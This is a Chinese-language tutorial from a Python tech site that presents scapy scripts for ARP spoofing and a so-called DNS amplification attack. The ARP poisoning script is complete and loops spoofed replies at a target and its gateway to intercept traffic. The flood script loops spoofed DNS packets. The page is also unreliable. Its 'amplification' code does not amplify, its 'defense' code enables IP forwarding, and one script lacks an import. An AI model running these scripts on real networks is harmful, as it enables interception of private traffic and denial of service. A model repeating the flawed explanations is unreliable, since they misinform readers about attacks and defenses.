我会给出基于Python中使用scapy模拟数据包实现arp攻击、dns放大攻击的完整攻略,并附上相应的示例说明。
一、arp攻击
1.1 arp欺骗
攻击机发送arp响应欺骗目标机,使得目标机将攻击机当作网关,将数据包发往攻击机上,达到窃取目标机信息的目的。
示例代码:
from scapy.all import *
import os
import sys
import threading
tgt_ip = "192.168.1.100" # 目标主机IP
gtw_ip = "192.168.1.1" # 网关IP
tgt_mac = "" # 目标主机MAC
gtw_mac = "" # 网关MAC
def get_mac(ip_addr):
responses, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_addr), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def arp_poison(tgt_ip, tgt_mac, gtw_ip, gtw_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gtw_ip
poison_target.pdst = tgt_ip
poison_target.hwdst = tgt_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = tgt_ip
poison_gateway.pdst = gtw_ip
poison_gateway.hwdst = gtw_mac
print("[*] 开始ARP欺骗,按Ctrl+C可停止")
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
print("[*] 停止ARP欺骗")
sys.exit(1)
def main():
global tgt_mac
global gtw_mac
tgt_mac = get_mac(tgt_ip)
if tgt_mac is None:
print("[!] 获取目标主机MAC失败")
sys.exit(1)
else:
print("[*] 目标主机MAC:", tgt_mac)
gtw_mac = get_mac(gtw_ip)
if gtw_mac is None:
print("[!] 获取网关MAC失败")
sys.exit(1)
else:
print("[*] 网关MAC:", gtw_mac)
# 创建ARP欺骗线程
arp_thread = threading.Thread(target=arp_poison, args=(tgt_ip, tgt_mac, gtw_ip, gtw_mac))
arp_thread.start()
if __name__ == '__main__':
main()
1.2 arp防御
采取静态ARP和动态ARP配合的方式,可以有效避免arp欺骗攻击。
静态ARP:由管理员手动定义IP地址和MAC地址的对应关系,此绑定关系无法自动更新。相当于将MAC地址绑定到相应的IP地址上,这样的绑定关系在网络中是静态不变的。
动态ARP:动态获取邻居信息(邻居就是在局域网中设置相同的网关的计算机)。在ARP协议中,有一种请求报文是“who has”,就是用来查询目标机器MAC地址的。发送“who has”报文请求的目标地址不存在时,会广播ARP请求报文,这时每台主机都会接收到该广播并且将自己的MAC地址回送给请求的机器,这样目标机器就获得了合法的下一跳MAC地址信息。
示例代码:
import os
import time
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') # 打开IP转发
while True:
os.system('arp -a')
time.sleep(5)
二、dns放大攻击
2.1 原理
既然我们能够自己伪造udp数据包,也就可以在发送数据包的时候将目标IP地址篡改成公共的DNS服务器IP地址,这样,通过DNS服务器就能向指定的目标ip发送非常大的响应包,从而攻击目标服务器主机。
2.2 示例代码
以下代码演示了如何通过scapy构造UDP包中的DNS消息格式,从而完成DNS放大攻击。
from scapy.all import *
import random
target_ip = "172.16.1.5" # 目标主机IP
spoof_ip = "8.8.8.8" # DNS服务器IP
target_port = 53 # 目标主机端口
query = DNS(rd=1, qd=DNSQR(qname="www.runoob.com"))
ip = IP(src=spoof_ip, dst=target_ip)
udp = UDP(sport=random.randint(1024, 65535), dport=target_port)
pkt = ip/udp/query
while True:
send(pkt)
以上就是基于Python中使用scapy模拟数据包实现arp攻击、dns放大攻击的完整攻略,以及两个示例代码。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子 - Python技术站
微信扫一扫 
支付宝扫一扫 